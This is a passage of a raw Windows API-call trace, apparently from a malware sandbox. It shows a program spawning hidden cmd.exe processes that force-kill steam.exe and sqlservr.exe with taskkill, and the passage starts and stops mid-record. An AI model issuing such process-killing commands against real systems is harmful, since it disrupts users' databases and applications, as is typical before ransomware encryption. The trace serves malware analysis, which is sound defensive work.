"c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0217.891] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x12496c38 | out: lpFileInformation=0x12496c38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0217.891] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0217.891] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x12496c88 | out: lpFileInformation=0x12496c88*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0217.891] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0217.891] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x12496cd8 | out: lpFileInformation=0x12496cd8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0217.891] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0217.891] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x12496d28 | out: lpFileInformation=0x12496d28*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0217.891] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0217.892] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x12496d78 | out: lpFileInformation=0x12496d78*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0217.892] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0217.892] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x12496dc8 | out: lpFileInformation=0x12496dc8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0217.892] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0217.892] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x12496e18 | out: lpFileInformation=0x12496e18*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0217.892] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0217.892] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x12496e68 | out: lpFileInformation=0x12496e68*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0217.892] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0217.892] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x1247cc30, nSize=0x64 | out: lpBuffer="") returned 0x63 [0217.892] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12496eb8 | out: lpFileInformation=0x12496eb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0217.893] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1247cd00, nSize=0x64 | out: lpBuffer="") returned 0x35 [0217.893] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12496f08 | out: lpFileInformation=0x12496f08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0217.893] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0217.893] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0217.893] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0217.893] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0217.893] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0217.893] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0217.893] GetEnvironmentStringsW () returned 0x8ea900* [0217.894] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0217.894] GetCurrentProcess () returned 0xffffffff [0217.894] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x140, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124a8b80, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124a8b80*=0x144) returned 1 [0217.894] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124a8b84, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124a8b84*=0x154) returned 1 [0217.894] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124a8b88, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124a8b88*=0x158) returned 1 [0217.895] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im steam.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x124b1500, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x144, hStdOutput=0x154, hStdError=0x158), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im steam.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x13c, hThread=0x130, dwProcessId=0xc04, dwThreadId=0x894)) returned 1 [0217.931] CloseHandle (hObject=0x130) returned 1 [0217.931] CloseHandle (hObject=0x158) returned 1 [0217.931] CloseHandle (hObject=0x154) returned 1 [0217.931] CloseHandle (hObject=0x144) returned 1 [0217.931] CloseHandle (hObject=0x140) returned 1 [0217.932] CloseHandle (hObject=0x134) returned 1 [0217.932] CloseHandle (hObject=0x138) returned 1 [0217.932] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0219.108] SetEvent (hEvent=0x150) returned 1 [0219.108] GetExitCodeProcess (in: hProcess=0x13c, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0219.109] GetProcessTimes (in: hProcess=0x13c, lpCreationTime=0x1249f3c0, lpExitTime=0x1249f3c8, lpKernelTime=0x1249f3d0, lpUserTime=0x1249f3d8 | out: lpCreationTime=0x1249f3c0, lpExitTime=0x1249f3c8, lpKernelTime=0x1249f3d0, lpUserTime=0x1249f3d8) returned 1 [0219.109] CloseHandle (hObject=0x13c) returned 1 [0219.109] SetEvent (hEvent=0x128) returned 1 [0219.109] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0219.125] SetEvent (hEvent=0x150) returned 1 [0219.125] SetEvent (hEvent=0x128) returned 1 [0219.125] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1248aa90, nSize=0x64 | out: lpBuffer="") returned 0x35 [0219.125] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a2aa8 | out: lpFileInformation=0x124a2aa8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0219.126] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0219.126] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x124a2af8 | out: lpFileInformation=0x124a2af8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0219.126] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0219.126] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a2b48 | out: lpFileInformation=0x124a2b48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0219.126] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0219.126] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x124a2b98 | out: lpFileInformation=0x124a2b98*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0219.127] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0219.127] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x124a2be8 | out: lpFileInformation=0x124a2be8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0219.127] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0219.127] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x124a2c38 | out: lpFileInformation=0x124a2c38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0219.127] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0219.127] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x124a2c88 | out: lpFileInformation=0x124a2c88*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0219.127] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0219.127] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x124a2cd8 | out: lpFileInformation=0x124a2cd8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0219.127] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0219.128] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x124a2d28 | out: lpFileInformation=0x124a2d28*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0219.128] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0219.128] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x124a2d78 | out: lpFileInformation=0x124a2d78*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0219.128] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0219.128] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x124a2dc8 | out: lpFileInformation=0x124a2dc8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0219.128] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0219.128] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x124a2e18 | out: lpFileInformation=0x124a2e18*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0219.128] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0219.128] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x1248ab60, nSize=0x64 | out: lpBuffer="") returned 0x63 [0219.128] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a2e68 | out: lpFileInformation=0x124a2e68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0219.128] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1248ac30, nSize=0x64 | out: lpBuffer="") returned 0x35 [0219.128] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a2eb8 | out: lpFileInformation=0x124a2eb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0219.129] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x13c [0219.129] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0219.129] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0219.129] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0219.129] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0219.129] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0219.129] GetEnvironmentStringsW () returned 0x8ea900* [0219.129] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0219.130] GetCurrentProcess () returned 0xffffffff [0219.130] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x13c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124b8a90, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124b8a90*=0x140) returned 1 [0219.130] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124b8a94, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124b8a94*=0x144) returned 1 [0219.130] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124b8a98, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124b8a98*=0x154) returned 1 [0219.130] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im sqlservr.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x124c1500, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x140, hStdOutput=0x144, hStdError=0x154), lpProcessInformation=0x123a3a80 | out: 